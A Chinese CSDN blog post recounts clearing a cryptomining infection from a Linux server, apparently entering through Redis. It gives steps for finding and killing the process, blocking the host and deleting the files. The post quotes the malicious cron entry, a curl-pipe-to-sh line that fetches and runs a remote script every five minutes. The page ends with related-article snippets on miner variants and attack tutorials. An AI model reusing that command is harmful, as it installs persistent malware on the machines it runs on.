linux服务器cpu异常升高

最新推荐文章于 2024-05-24 10:07:00 发布
最新推荐文章于 2024-05-24 10:07:00 发布
阅读量2.9k 收藏 1
点赞数 1
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_42912498/article/details/103860686
版权

1)linux服务器cpu异常升高,甚至飙升到了100%,但是top找不到所占用cpu的进程,怀疑因为redis的漏洞被植入了挖矿病毒

2)发现有异常的定时任务:

*/5 * * * * curl -fsSL http://pw.pwndns.pw/root.sh | sh

 3)通过busybox top 查找相关进程,将该进程kill掉后cpu恢复正常,但过一会又升高

4)进入该进程目录查找文件:

5)进入查找到的文件路径:

6)打开后发现和定时任务中的一样:

7)ping pw.pwndbs.pw 查到ip,将该ip禁掉,或者写入/etc/hosts文件中,再重定向到本地127.0.0.1

8)删掉文件.update和.systemd文件,在kill -9 1201

9)cpu使用率回复正常,并且暂时不再升高,等待后续观察。

凤舞无夜
关注
  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
Linux杀不死的进程之CPU使用率700%解决方法
01-20
1. 问题发现 [root@zwlbs3 ~]# top i. 发现有个进程CPU使用率居然700%,COMMAND 是一些随机的字符串组成,完了~ 中标了;第一想到就是“沙雕”它,kill 命令给我上。 [root@zwlbs3 ~]# kill -9 PID ii. 但是发现 kill 该进程平静一会后又启动了。 注:老图复用,PID、COMMAND 都有变化。 2. 查看进程的详细信息 [root@zwlbs3 ~]# cd /proc/748/ [root@zwlbs3 748]# ls -ial # 748是该进程的 PID,根据你的 PID 来查看即可。 如图:
-bash这样的木马,你遇到过没?
sqlora的专栏
06-15 5734
第一次遇到如此难搞的病毒木马-bash。 # cat /etc/redhat-release CentOS release 6.7 (Final) # ssh -V OpenSSH_5.3p1, OpenSSL 1.0.1e-fips 11 Feb 2013 进程和文件清除后,总是会自动起来,然后占用50%的CPU netstat-ano|more 用到的命令: sar 1 10 top lsof -p 进程号 ,可以看关联了哪些进程及和那里通信,这里看到会去请求这个外部...
linux系统CPU持续飙高的排查方法
最新发布
qq_56104175的博客
05-24 493
如果一台服务器,它的cpu使用率一直处于一个高峰值,此时服务器可能导致无法访问。例如无法ssh连接。操作卡顿,服务器响应慢等问题。
Gitlab远程代码执行漏洞(CVE-2021-22205)在野利用,8220挖矿团伙最新变种分析
qq_53058639的博客
07-23 399
近日,阿里云安全监测到Gitlab远程代码执行(CVE-2021-22205)在野利用,其团伙不仅利用4层协议服务进行入侵,还集成了使用比较广的WebRCE漏洞,最终通过持久化方式进行挖矿、木马后门维持,对用户主机资源、资产产生不良危害,通过攻击手法、文件命名自动确认为8220挖矿团伙最新变种。阿里云安全持续对最新变种进行监控,发现至10月21日后传播有所上升,11月4日发现利用Gitlab远程代码漏洞进行入侵,提醒广大企业客户注意防护。
linux cpu飙高原因排查
weixin_54643105的博客
03-22 433
最近项目上刚遇到的问题,刚好看到主任的这篇文章,顺利解决,记录一下 cpu飙高是很常见的线上问题,这都不会的话,属实有点拉跨。 兄弟萌不用慌,来我教你一套连招 先来个项目,整个api,到时候我们请求/cpu/{count}就能手动拉高cpu,机智鬼~ @GetMapping("/cpu/{count}") public long cpuTest(@PathVariable("count") long count) { long number = 0;
Linux环境下定位CPU飙高的原因
tianmlin1的博客
02-24 1343
前言 实际开发与维护java项目的时候,经常会遇上cpu消耗过多的情况,导致接口响应迟缓。造成cpu过高的原因很多,比如线程互相等待,线程死锁,网络带宽跟不上等等。本文将通过jdk自带的工具jstack查询日志定位原因。 操作步骤 查找java进程 通过top命令查询消耗cpu最高的java进程,然后shitf+p 倒序,如图: user表示该进程的所属用户,在后续的jstack中需...
Linux 服务器中提高CPU使用率脚本
08-11
1、创建存放脚本文件目录 mkdir -p /etc/press chmod 777 /etc/press 2、启动定时任务进程 echo 'systemctl start crond.service...部署成功后查看当前使用率:top -n 1|grep Cpu|awk '{print "当前CPU使用率:"$2"%"}'
linux cpu使用率测试
02-13
当发现服务器或工作站上的CPU使用率异常增高时,需要及时进行诊断和排查,以避免对业务造成影响。本文将详细介绍两种常用的CPU使用率测试与定位方法。 ### 方法一:通过Top命令与BEP特权节点追踪高CPU使用率线程 *...
java引起的linux服务器性能问题查找
11-17
然而,在实际运行过程中,Java应用可能会导致Linux服务器出现各种性能问题,如CPU使用率异常升高、内存泄漏等。这些问题不仅会影响应用程序的正常运行,严重时还可能导致整个系统的崩溃。因此,掌握有效的性能问题...
详解Linux CPU负载和CPU使用率
01-10
CPU负载和 CPU使用率 这两个从一定程度上都可以反映一台机器的繁忙程度. cpu使用率反映的是当前cpu的繁忙程度,忽高忽低的原因在于占用cpu处理时间的进程可能处于io等待状态但却还未释放进入wait。 平均负载(load ...
ios app的dns to ip的使用
12-02
ios app的dns to ip的使用,ios app的dns to ip的使用。
国外Python黑客技术,诱骗玩的真好,Dnspwn攻击实战教程!
weixin_34150224的博客
07-16 603
原理 记得有个大佬说过,百分之八十的黑客工具都是用Python实现。此黑客攻击首先利用"airpwn"工具创建了目标HTTP,接着对DNS进行攻击。 这种攻击的思想非常简单: 假如在一个开放的WLAN上有两个人:Bob和Eve。E想让B访问她创建的恶意网页,这样她就可以通过隐藏性的下载给Bob的计算机上安装恶意软件,或者可能展示一个欺骗性的站点来试图窃取...
安全知识、工具网址集锦(持续更新)
白帽子九一
11-04 2047
Gcow安全团队: https://cloud.tencent.com/developer/column/85233
使用Grafana搭建监控系统
热门推荐
helloworld的专栏
06-29 20万+
Ubuntu下通过下面的命令获取安装介质 wget https://s3-us-west-2.amazonaws.com/grafana-releases/release/grafana_4.3.2_amd64.deb sudo dpkg -i grafana_4.3.2_amd64.deb 直接解压即可 sudo dpkg -i grafana_4.3.1_amd64.d
pwn 练习笔记 暑假十一天
SsMing的博客
07-23 428
题目来自:https://www.jarvisoj.com/challenges guestbook,一道特别简单的题 checksec查看:有个栈不可执行保护,没什么问题 IDA打开查看伪代码,先看main函数: 还看到调用了fopen和fgetc这样的函数,所以找了一下,发现good_game这个函数; 这个函数读取了flag.txt,这个函数的开始地址为000000...
使用Python进行无线攻击--Dnspwn攻击
韦宇的博客
07-08 3372
引言   前不久,我在Raidersec博客上发布了一篇博客文章,介绍了如何利用Python和Scapy实现绕过鉴权的攻击。我非常高兴写出这篇文章,因为这么做我不仅了解了如何使用aircrack套件,还有机会深度地了解无线攻击运作方式有什么不同。   因此,正如文中所说,这篇博客文章将引出一系列讨论如何利用Python实现普通的无线攻击的短小精悍的博客文章。像以往一样,我希
linux服务器CPU飙升解决办法_MYSQL
David_Run的博客
03-08 3106
1.top //终端输入命令查询进程 #使用top命令查看CPU占用进程,确认mysql进程占用CPU资源过大2、首先考虑磁盘占用问题,清理日志文件释放空间df -h #查看磁盘空间占用du -h #查看当前文件夹或文件大小ls -lh $(find / -type f -size +100M) #查找大于100M的文件#检查清理nginx日志及其他日志文件。3、清除服务器缓存free -m #查看缓存的命令,其中buff/cache项为缓存占用#清理缓存的命令 echo 1 > /proc/sys/
查看linux服务器cpu型号
07-12
要查看 Linux 服务器CPU 型号,可以使用以下命令之一: 1. 使用 lscpu 命令:在终端中输入 `lscpu`,它将显示有关 CPU 的详细信息,包括型号、频率和核心数等。 2. 使用 cat /proc/cpuinfo 命令:在终端中输入 `cat /proc/cpuinfo`,它将显示有关 CPU 的详细信息,包括型号、频率和核心数等。 这些命令可以在大多数 Linux 发行版上使用,包括 Ubuntu、CentOS、Debian 等。请注意,您可能需要以 root 或具有适当权限的用户身份运行这些命令。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值